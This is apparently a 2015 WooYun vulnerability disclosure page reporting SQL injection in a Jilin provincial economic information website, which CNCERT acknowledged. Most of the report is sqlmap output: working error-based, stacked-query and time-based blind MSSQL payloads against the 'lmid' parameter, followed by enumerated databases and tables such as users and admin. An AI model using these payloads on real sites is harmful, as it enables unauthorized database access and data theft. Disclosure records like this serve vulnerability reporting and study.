当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147308

漏洞标题:吉林省经济信息网存在SQL注射。8库众多表

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-17 09:03

修复时间:2015-12-05 15:06

公开时间:2015-12-05 15:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

吉林省经济信息网存在SQL注射。8库众多表

详细说明:

http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049

1.png


sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: lmid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: lmid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] fgw
[*] jljjw
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: lmid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] fgw
[*] jljjw
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: jljjw
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.article | 75607 |
| dbo.FRefer | 12830 |
| dbo.Visitor | 8766 |
| dbo.FMozilla | 5927 |
| dbo.FIptwo | 3506 |
| dbo.projectsb | 2657 |
| dbo.StatDay | 2425 |
| dbo.plate | 1194 |
| dbo.plate_view | 1194 |
| dbo.dzfw | 1144 |
| dbo.users | 1041 |
| dbo.filelista | 809 |
| dbo.FScreen | 533 |
| dbo.InfoList | 491 |
| dbo.FArea | 482 |
| dbo.sysuser_inputcolumn | 194 |
| dbo.user_view | 194 |
| dbo.FIpone | 165 |
| dbo.sysconstraints | 161 |
| dbo.temps | 143 |
| dbo.FSystem | 113 |
| dbo.StatMonth | 96 |
| dbo.FAddress | 93 |
| dbo.FBrowser | 63 |
| dbo.SYS_TMP | 61 |
| dbo.TH_area | 52 |
| dbo.IpScope | 33 |
| dbo.b | 26 |
| dbo.infofeedback | 23 |
| dbo.sysuser_checkcolumn | 17 |
| dbo.userrole_module | 17 |
| dbo.TH_hangye | 15 |
| dbo.projectsd | 14 |
| dbo.sysmodule | 14 |
| dbo.leavemessage | 13 |
| dbo.article_StatDay | 12 |
| dbo.article_StatWeek | 12 |
| dbo.D99_Tmp | 12 |
| dbo.StatYear | 12 |
| dbo.usersb | 10 |
| dbo.sysuser | 9 |
| dbo.sysuser_role | 9 |
| dbo.TH_diqu | 9 |
| dbo.sysuserrole | 8 |
| dbo.StatWeek | 7 |
| dbo.article_FBrowser | 6 |
| dbo.article_FIpone | 6 |
| dbo.article_FIptwo | 6 |
| dbo.article_FMozilla | 6 |
| dbo.article_FRefer | 6 |
| dbo.article_FScreen | 6 |
| dbo.article_FSystem | 6 |
| dbo.article_StatYear | 6 |
| dbo.article_temps | 6 |
| dbo.usersa | 6 |
| dbo.TH_fangshi | 5 |
| dbo.TH_tzfs | 5 |
| dbo.filelistb | 4 |
| dbo.TH_zblx | 4 |
| jlsa.infofeedbacktype | 4 |
| dbo.article_InfoList | 3 |
| dbo.dealprocess | 3 |
| dbo.lead | 3 |
| dbo.syssegments | 3 |
| dbo.TH_biaoqian | 3 |
| dbo.TH_jch | 3 |
| jlsa.infofeedback | 3 |
| dbo.browser | 2 |
| dbo.lktype | 2 |
| dbo.plate_plate | 2 |
| dbo.projectsa | 2 |
| dbo.TH_tzfszd | 2 |
| dbo.TH_xzh | 2 |
| dbo.TH_zhuti | 2 |
| dbo.admin | 1 |
| dbo.config | 1 |
| dbo.D99_REG | 1 |
| dbo.FVisit | 1 |
| dbo.infofeedbacktype | 1 |
| dbo.leadsort | 1 |
| dbo.NotDownload | 1 |
| dbo.projectsc | 1 |
| dbo.webuser | 1 |
| dbo.xmpwd | 1 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.sysconstraints | 91 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.roysched | 86 |
| dbo.employee | 43 |
| dbo.sysconstraints | 34 |
| dbo.titleauthor | 25 |
| dbo.titleview | 25 |
| dbo.authors | 23 |
| dbo.sales | 21 |
| dbo.titles | 18 |
| dbo.jobs | 14 |
| dbo.pub_info | 8 |
| dbo.publishers | 8 |
| dbo.stores | 6 |
| dbo.discounts | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS | 2260 |
| dbo.spt_values | 730 |
| INFORMATION_SCHEMA.ROUTINES | 651 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 |
| INFORMATION_SCHEMA.COLUMNS | 379 |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 |
| dbo.spt_datatype_info | 36 |
| INFORMATION_SCHEMA.TABLES | 34 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 |
| dbo.spt_server_info | 29 |
| dbo.spt_provider_types | 25 |
| INFORMATION_SCHEMA.VIEWS | 25 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 |
| dbo.spt_datatype_info_ext | 10 |
| INFORMATION_SCHEMA.SCHEMATA | 8 |
| dbo.syssegments | 3 |
| dbo.spt_monitor | 1 |
| dbo.sysconstraints | 1 |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.Orders | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.Products | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.sysconstraints | 43 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+

漏洞证明:

1

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-21 15:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无